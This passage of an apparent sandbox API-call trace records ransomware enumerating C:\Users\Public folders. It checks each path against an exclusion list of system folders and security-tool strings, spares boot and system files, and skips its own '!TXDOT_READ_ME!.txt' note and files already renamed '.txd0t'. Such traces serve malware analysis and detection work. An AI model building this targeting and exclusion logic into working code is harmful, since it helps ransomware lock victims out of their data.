returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="C:\\WINDOWS") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="C:\\Program Files") returned 0x0 [0129.798] GetProcessHeap () returned 0xe30000 [0129.799] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xed39f8 [0129.799] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Public\\Documents", cchMax=1076 | out: psz1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0129.799] StrNCatW (in: psz1="C:\\Users\\Public\\Documents", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Public\\Documents\\*") returned="C:\\Users\\Public\\Documents\\*" [0129.799] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2370 [0129.799] StrCmpW (psz1=".", psz2=".") returned 0 [0129.800] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.800] StrCmpW (psz1="..", psz2=".") returned 1 [0129.800] StrCmpW (psz1="..", psz2="..") returned 0 [0129.800] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.800] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.800] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.800] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0129.800] StrCmpW (psz1="My Music", psz2=".") returned 1 [0129.800] StrCmpW (psz1="My Music", psz2="..") returned 1 [0129.800] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0129.800] StrCmpW (psz1="My Pictures", psz2=".") returned 1 [0129.800] StrCmpW (psz1="My Pictures", psz2="..") returned 1 [0129.800] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0129.800] StrCmpW (psz1="My Videos", psz2=".") returned 1 [0129.800] StrCmpW (psz1="My Videos", psz2="..") returned 1 [0129.800] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0129.800] FindClose (in: hFindFile=0xec2370 | out: hFindFile=0xec2370) returned 1 [0129.801] GetProcessHeap () returned 0xe30000 [0129.801] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.801] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466cad2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0129.801] StrCmpW (psz1="Downloads", psz2=".") returned 1 [0129.801] StrCmpW (psz1="Downloads", psz2="..") returned 1 [0129.801] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0129.801] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0129.801] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Downloads", cchMax=1056 | out: psz1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\windows\\system32\\") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\windows\\system\\") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\appdata\\local\\") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\boot\\") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\perflogs\\") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\programdata\\") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\drivers\\") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\wsus\\") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="crypt_detect") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="cryptolocker") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="ransomware") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="C:\\WINDOWS") returned 0x0 [0129.801] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.802] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="C:\\Program Files") returned 0x0 [0129.802] GetProcessHeap () returned 0xe30000 [0129.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xed39f8 [0129.802] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Public\\Downloads", cchMax=1076 | out: psz1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0129.802] StrNCatW (in: psz1="C:\\Users\\Public\\Downloads", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Public\\Downloads\\*") returned="C:\\Users\\Public\\Downloads\\*" [0129.802] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466cad2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2370 [0129.802] StrCmpW (psz1=".", psz2=".") returned 0 [0129.802] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466cad2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.802] StrCmpW (psz1="..", psz2=".") returned 1 [0129.802] StrCmpW (psz1="..", psz2="..") returned 0 [0129.802] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.802] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.802] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.802] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0129.802] FindClose (in: hFindFile=0xec2370 | out: hFindFile=0xec2370) returned 1 [0129.802] GetProcessHeap () returned 0xe30000 [0129.802] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.802] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x5afc45f0, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5afc45f0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0129.802] StrCmpW (psz1="Libraries", psz2=".") returned 1 [0129.802] StrCmpW (psz1="Libraries", psz2="..") returned 1 [0129.802] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0129.802] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0129.802] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Libraries", cchMax=1056 | out: psz1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0129.802] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\windows\\system32\\") returned 0x0 [0129.802] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.802] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\windows\\system\\") returned 0x0 [0129.802] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.802] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.802] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\appdata\\local\\") returned 0x0 [0129.803] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.803] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.803] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.803] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\boot\\") returned 0x0 [0129.803] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\perflogs\\") returned 0x0 [0129.803] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\programdata\\") returned 0x0 [0129.803] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\drivers\\") returned 0x0 [0129.803] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\wsus\\") returned 0x0 [0129.803] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.803] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.803] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="crypt_detect") returned 0x0 [0129.803] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="cryptolocker") returned 0x0 [0129.803] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="ransomware") returned 0x0 [0129.803] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="C:\\WINDOWS") returned 0x0 [0129.803] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.803] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="C:\\Program Files") returned 0x0 [0129.803] GetProcessHeap () returned 0xe30000 [0129.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xed39f8 [0129.803] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Public\\Libraries", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0129.803] StrNCatW (in: psz1="C:\\Users\\Public\\Libraries", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries\\*") returned="C:\\Users\\Public\\Libraries\\*" [0129.803] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x5afc45f0, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5afc45f0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2370 [0129.803] StrCmpW (psz1=".", psz2=".") returned 0 [0129.803] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x5afc45f0, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5afc45f0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.803] StrCmpW (psz1="..", psz2=".") returned 1 [0129.803] StrCmpW (psz1="..", psz2="..") returned 0 [0129.803] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af9e5fe, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5af9e5fe, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5afc45f0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.803] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.803] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.803] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Public\\Libraries", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0129.803] StrNCatW (in: psz1="C:\\Users\\Public\\Libraries", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0129.803] StrNCatW (in: psz1="C:\\Users\\Public\\Libraries\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\Public\\Libraries\\!TXDOT_READ_ME!.txt" [0129.804] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.804] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.804] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.804] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.804] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.804] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.804] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.804] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.804] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.804] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.804] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.804] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.804] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.804] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.804] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.804] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.804] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xaf, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.804] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.804] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.804] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5af9e5fe, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x5c0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="RecordedTV.library-ms.txd0t", cAlternateFileName="RECORD~1.TXD")) returned 1 [0129.804] StrCmpW (psz1="RecordedTV.library-ms.txd0t", psz2=".") returned 1 [0129.804] StrCmpW (psz1="RecordedTV.library-ms.txd0t", psz2="..") returned 1 [0129.804] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Public\\Libraries", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0129.804] StrNCatW (in: psz1="C:\\Users\\Public\\Libraries", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0129.804] StrNCatW (in: psz1="C:\\Users\\Public\\Libraries\\", psz2="RecordedTV.library-ms.txd0t", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.txd0t") returned="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.txd0t" [0129.804] PathFindExtensionW (pszPath="RecordedTV.library-ms.txd0t") returned=".txd0t" [0129.804] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.804] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5af9e5fe, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x5c0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="RecordedTV.library-ms.txd0t", cAlternateFileName="RECORD~1.TXD")) returned 0 [0129.804] FindClose (in: hFindFile=0xec2370 | out: hFindFile=0xec2370) returned 1 [0129.804] GetProcessHeap () returned 0xe30000 [0129.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.804] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0129.804] StrCmpW (psz1="Music", psz2=".") returned 1 [0129.804] StrCmpW (psz1="Music", psz2="..") returned 1 [0129.804] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0129.805] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0129.805] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Music", cchMax=1056 | out: psz1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\windows\\system32\\") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\windows\\system\\") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\appdata\\local\\") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\boot\\") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\perflogs\\") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\programdata\\") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\drivers\\") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\wsus\\") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="crypt_detect") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="cryptolocker") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="ransomware") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", 